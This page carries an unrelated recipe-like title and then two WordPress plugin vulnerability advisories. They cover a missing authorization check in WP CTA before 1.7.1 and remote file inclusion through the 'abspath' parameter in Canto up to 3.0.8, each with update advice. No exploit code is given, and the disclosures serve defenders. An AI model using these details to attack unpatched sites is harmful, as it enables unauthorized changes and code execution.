Sushi Com Abacate

**Name of the Vulnerable Software and Affected Versions** WP CTA – Call To Action Plugin, Sticky CTA, Sticky Buttons versions prior to 1.7.1 **Description** The WP CTA – Call To Action Plugin, Sticky CTA, Sticky Buttons plugin for WordPress is susceptible to unauthorized data modification due to a missing capability check. Specifically, the `update cta status` and `change sticky sidebar name` functions lack proper authorization controls. This allows unauthenticated attackers to modify the status of sticky call-to-action buttons and update the name displayed in the WordPress CTA Dashboard. **Recommendations** Update WP CTA – Call To Action Plugin, Sticky CTA, Sticky Buttons to version 1.7.1 or later.

**Name of the Vulnerable Software and Affected Versions** Canto plugin for WordPress versions up to, and including, 3.0.8 **Description** The issue allows unauthenticated attackers to include remote files on the server, resulting in code execution. This is achieved via the `abspath` parameter and requires `allow url include` to be enabled on the target site in order to exploit. **Recommendations** For versions up to, and including, 3.0.8, update to a version later than 3.0.8 to resolve the issue. As a temporary workaround, consider disabling the `abspath` parameter until a patch is available. Restrict access to the Canto plugin to minimize the risk of exploitation, and ensure `allow url include` is disabled to prevent code execution.